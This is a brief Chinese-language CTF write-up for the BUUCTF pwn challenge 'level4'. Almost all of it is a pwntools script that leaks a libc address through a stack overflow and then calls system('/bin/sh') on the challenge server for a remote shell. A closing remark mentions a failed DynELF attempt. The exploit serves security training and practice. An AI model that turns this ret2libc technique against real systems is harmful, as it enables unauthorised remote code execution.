直接上wp
from pwn import*from LibcSearcher import*context.log_level = 'debug'#io = process('./level4')io = remote("node4.buuoj.cn",28422)#gdb.attach(io)elf =ELF('./level4')write_plt = elf.plt['write']write_got = elf.got['write']read_got =elf.got['read']main_addr = elf.sym['main']payload = b'a'*(0x88+4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(4)io.sendline(payload)#pause()read_addr = u32(io.recv(4))log.success('read ==>'+hex(read_addr))libc = LibcSearcher('read',read_addr)libcbase = read_addr - libc.dump('read')system_addr = libcbase +libc.dump('system')bin_sh = libcbase +libc.dump('str_bin_sh')payload = b'a'*(0x88+4)+p32(system_addr)+p32(main_addr)+p32(bin_sh)io.sendline(payload)io.interactive()
尝试了用dynelf做,没有binsh就往bss段注入,但是好像没成功,懒得去用了,我现在也搞不清两种方法哪种好。
若有收获,就点个赞吧
0 人点赞
